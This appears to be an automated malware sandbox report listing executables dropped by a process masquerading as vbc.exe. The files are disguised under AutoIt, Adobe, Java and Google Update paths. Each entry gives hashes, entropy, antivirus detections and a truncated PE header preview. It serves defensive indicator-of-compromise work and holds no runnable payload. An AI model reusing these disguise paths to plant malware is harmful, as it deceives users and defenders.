                                                                                                                                                                    SHA-512:5AC7442D1E637B6605E7E69F8EBBF85EEE3F2C8E4FB4ED4E5A6F95BF47E7B3222BE3CAEF1342ED68EACDDBF421F3FAD308F8B05712040154F9BF12B383150958
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !.....;..... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2203136
                                                                                                                                                                    Entropy (8bit):7.6470360055215005
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:QK0eqkSR7Xgo4TiRPnLWvJZDmg27RnWGj:QK0pR7Xn4TiRCvJZD527BWG
                                                                                                                                                                    MD5:E7AB3AA0C8ACED18E7679E0C6C01BFDB
                                                                                                                                                                    SHA1:68FAA0C6239CC7DFE5317A6E29A377F804DEAD5B
                                                                                                                                                                    SHA-256:93EBD57947D795A2F85DBCCBB26D8F2057F55F3BE6ABF46890CD667CB4D104D7
                                                                                                                                                                    SHA-512:E8CC71CA19F87A6AE5604A1061C3F91F965549185FD25FB0AF676673DB6D115D58C44734B5A5F4F737B3E52340EE20D9D0D4AE79491E781113BD2FD55F198466
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2369024
                                                                                                                                                                    Entropy (8bit):7.56505873975263
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:/fYP1JsEDkSR7Xgo4TiRPnLWvJZDmg27RnWGj:3YPBR7Xn4TiRCvJZD527BWG
                                                                                                                                                                    MD5:F7C2C152467B3D928F356D5C21916A55
                                                                                                                                                                    SHA1:46D3470EC886DD63932E9998EC610385CADB13C2
                                                                                                                                                                    SHA-256:8AD33A0B90546483B20F6F642901DDC327380F64AA01E71D5C1CDC9711FE2A8C
                                                                                                                                                                    SHA-512:B91AC59C88C5BCF953C0B63C0FCDF1C152C609F1D66EE4A2C0CCA9D7AC142A0C7AF0071ECF5D534E1E760DB3BCA4809AC9C60CBCE764FCE996177CA3E274A419
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......%... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1245184
                                                                                                                                                                    Entropy (8bit):5.12357943924453
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:k62SYUcknnvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:xYUcknvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:443FFDD0A29C04771375A070D32DEF97
                                                                                                                                                                    SHA1:AAB149D73CE13407FCEA095CA76F8AC2EF2079BB
                                                                                                                                                                    SHA-256:5FEEE380CFC8C1E30B4DA001A27870055A1ED8E2AE28C2D78D9B469ED6A26F2F
                                                                                                                                                                    SHA-512:177F6D4922B3F60B6344460321166A71C523A2DBE508BCD941C8CBF41BEB6FFC0FEDD399FD51172496521740B3AC00440665F8FCEA75736FA0A6C1C4E062B2E0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@.......,.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1640448
                                                                                                                                                                    Entropy (8bit):7.16667679223097
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:++iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS1Dmg27RnWGj:qSktbpTD527BWG
                                                                                                                                                                    MD5:4D41765CF6C8E806DA7114BFF494B34D
                                                                                                                                                                    SHA1:229838DE82E050B916C4E7F888EBE84C1D5CDF2B
                                                                                                                                                                    SHA-256:44D1A2A897C26F89F8BDB678155F7F313F21E7C79B9F358808157130B36706A2
                                                                                                                                                                    SHA-512:BC274329AFC478608E095D4FB33DCB0E4A4C34A58B244F32607B1E33DEB5DD49B1AC9A3524D69A5F89C373AB04F8CE9CFBDEE6B7B53553271A2D940C3DDFB5CF
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................Q.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2953728
                                                                                                                                                                    Entropy (8bit):7.094631430460647
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:uGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxL+Dmg27RnWGj:K4OEtwiICvYMRfeD527BWG
                                                                                                                                                                    MD5:83AC59C9FDF4021ACDEC76D82ECEFA88
                                                                                                                                                                    SHA1:F57FA4F72542C7E7F528FFE96D123DB72C8AE4A1
                                                                                                                                                                    SHA-256:19EEA7FEB74873F74F7F004BD4834466A921D00DC1179126EDD91E8EF64F279F
                                                                                                                                                                    SHA-512:0CE6148A74DB858F2A36CCA2C57C4DDB8A6F02F2C9F86FACF1D2083FB8702D695FA32F66967820FFADDFA47A83776D0CEE28CF51A74217ABF75077F4D1B5F212
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......c-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1485824
                                                                                                                                                                    Entropy (8bit):5.496411717236595
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:gAMuR+3kMbVjhJsqjnhMgeiCl7G0nehbGZpbD:hD+lbVjhNDmg27RnWGj
                                                                                                                                                                    MD5:411C9789FE41993B74B7EBA11856F55C
                                                                                                                                                                    SHA1:68546F9097C24A11F47309292A9B08B37456A66F
                                                                                                                                                                    SHA-256:65687F81288F1CA0AB1B6D4A30D0FD67F203227C6F09983C55E8C3D538565626
                                                                                                                                                                    SHA-512:DF80EC656F668D5F06C6D1CC2951F3A19A692D9E9E85E59BBDCA20C8B722A403506C42B38AEA9A97A172E0EC95F09E590E0B40E10E2F62F9ABD13AE187D54455
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..................................4.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1290240
                                                                                                                                                                    Entropy (8bit):5.277782615464925
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:OImGUcsvZZdubv7hfl3dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:OxGBcmltsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:C0525CFD34E032B8DE30555E54329700
                                                                                                                                                                    SHA1:335F38DD495A328453B3C0DBC7AF07E753CBE660
                                                                                                                                                                    SHA-256:6A5784359D3CFF5FB8AEB767595945EAB50BA999BD15BB555041055008924CF9
                                                                                                                                                                    SHA-512:DAE03F8345A6869AD3A07002F2BA072918F7A89AB8BBE1A460BC5EF4E11AE46D85A3A5B78312A06FCDBF09954D14329D775FC70CFA9D0B7A55E280D9EF48EFA1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................Y......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1644544
                                                                                                                                                                    Entropy (8bit):5.694817171376491
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:K0vHyeLj8trn3ws/sqjnhMgeiCl7G0nehbGZpbD:7tj4rgsjDmg27RnWGj
                                                                                                                                                                    MD5:9801C81A179DB8F89BCE1115C2F6A762
                                                                                                                                                                    SHA1:F4E5609C671C41635E0425AD79563CBB8C17C87D
                                                                                                                                                                    SHA-256:B3C73E830D550CFDB8C5527958B73C418D8B6FC9700B8ABEBF75673416E57811
                                                                                                                                                                    SHA-512:ECCBFCB6AF6E78F6E4EA3C0E113242739B1C2770E36E6F6E5791F980F9FB247B4B30EAACDFE992C9D7ADCE76FB98ABE3E19CFB5ECB98713AE6ECEBFAA23027C0
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1781760
                                                                                                                                                                    Entropy (8bit):7.279684404845038
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:soMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/Z6sqjnhMgeiCl7G0nehbGZpv:R4i0wGJra0uAUfkVy7/ZODmg27RnWGj
                                                                                                                                                                    MD5:4DFD19E114CA56C2FB6E682C1F656921
                                                                                                                                                                    SHA1:71DAE7E8BC4670DDE5BC404049015DC321FD91B4
                                                                                                                                                                    SHA-256:4E7CF3FBFF9DF7EEE70BBFBD8D75D7FB36D3249A2F0D6D6973ABF8A0C7020EBC
                                                                                                                                                                    SHA-512:384549CFCC2897BD4B6CFC1526D16F9C29919358ED61EA36DA9C092ABCF65F6F754B3782B4C3917602F410801E6632013F38D63DC750B0056B31238EE08ED8AC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1318400
                                                                                                                                                                    Entropy (8bit):7.448782639181649
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:EeR0gB6axoCf0R6RLQRF/TzJqe58BimxsqjnhMgeiCl7G0nehbGZpbD:wgHxmR6uBTzge5MimFDmg27RnWGj
                                                                                                                                                                    MD5:911C460C5787AA337B45595E27478B04
                                                                                                                                                                    SHA1:E107D7187682A48A1629C7438BF2CD04D528BFB7
                                                                                                                                                                    SHA-256:3EC595A206A2E3EF357B1FB55F90582A9623B67081B1BA71906CCD334379D2BA
                                                                                                                                                                    SHA-512:D5CFB715027F359938C7AB777AB2A3EF41BEC36CF4AF8021332B349D07C6566CA8C1CA769B808252CAA33A7752D3DC1EA806183710A8D62AFDCF4FE1BE242F27
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                    Entropy (8bit):5.446079873034151
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:2nEbH0j4x7R6SvyCMPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:2kwOtO7PsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:B67993E34F11133F7878DE841D83488D
                                                                                                                                                                    SHA1:670885B3205484632B16F098EB626EA22856A5FE
                                                                                                                                                                    SHA-256:1C2DA0484A91BD0506F7423559C1D37FC9326C76F183C9342A29E0B92CEB6941
                                                                                                                                                                    SHA-512:6ED68A03878719ECE37FC77F5A48DDB50DE641CF408CC446B9914C87C395C855D3D1A08FF20947A142E5C8DC960E554BE1F84ADA63C2BB0FAB4E07BE426C20A3
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......E.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                    Entropy (8bit):5.446836287935732
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:+nU/h/4K4sqjnhMgeiCl7G0nehbGZpbD:+U/VkDmg27RnWGj
                                                                                                                                                                    MD5:E8EC4D2A9C075AEBC6D14755C3E24786
                                                                                                                                                                    SHA1:627F5FCA9C291B29C1C4540CC793FF182475C842
                                                                                                                                                                    SHA-256:C2E03246B6B86978028D04D0233A0E333E9343F7DFDE9FE37863571F60C63F1C
                                                                                                                                                                    SHA-512:307E36F761A1ED49DCBBDEACA238EF64D933A96F44363B0B2EE88BF1A6189C142D3BCEB7D1BBEC2D9FC25328D1898E9E2E64F647FF7DE3C63B941634DBBCE1FC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......`........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                    Entropy (8bit):5.48375723428586
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qx71iBLZ05jNTmJWExDsqjnhMgeiCl7G0nehbGZpbD:qxhiHIjNgHDmg27RnWGj
                                                                                                                                                                    MD5:7C3244095778AC33F2176029B85B56D2
                                                                                                                                                                    SHA1:8A4E654AC5333EB5DBCAC0247E0F887A936F4BB0
                                                                                                                                                                    SHA-256:7CC0577797C0FEAE9E3D312A04B7EDF3B10CC4404979AF47FE1F6D23D23CE189
                                                                                                                                                                    SHA-512:8F8767462EA7995D9735151856996CB1B221F97119CDEB11FC8858556506CB34555A62A02B92133B13EDF268A8B3B173F92781DF5BF33C6B90B45AE17DF6135F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                    Entropy (8bit):5.466733690556043
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:9lnRklQ6fgJcEwixJsqjnhMgeiCl7G0nehbGZpbD:xoRfgJcEwCNDmg27RnWGj
                                                                                                                                                                    MD5:90CFC8EE41F54881D1E7FAF7293F9FFC
                                                                                                                                                                    SHA1:E4775A881A01ED34FD8FBF3C181BE790639322E5
                                                                                                                                                                    SHA-256:40CA0A868A6BA5DF749E63A29D39C43BC741816250FC634C964907B780A87F06
                                                                                                                                                                    SHA-512:C4333007B39B38FE6A139D389F67628FDF1CCA6A9C4E045E706B505173C634F3819082A0565BBB3440A819BC901BB28E81286FC206F3F8BDFC97AE117124853A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................h......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                    Entropy (8bit):5.496546902909799
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:VW25k8hb0Haw+x5sqjnhMgeiCl7G0nehbGZpbD:VWyk8SHawm9Dmg27RnWGj
                                                                                                                                                                    MD5:8C60FB5DC66CCE635B60AC783A3548F7
                                                                                                                                                                    SHA1:793B4109264D2EB4287411042926CD6EDAC6C301
                                                                                                                                                                    SHA-256:9956E14CE7FE037BAA534065FAADA476043811E423D55EC7FB2BF8E39C7D8F29
                                                                                                                                                                    SHA-512:2DA4AF2FAD4AEB1A42A24F03DD77345D5F65E5E405D0859CDFFF013F352F3BB61CDDD50DCAE73441C857EAE59DECA1AD2AE69090507A18D615A361DE6FCCBE48
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Reputation:unknown
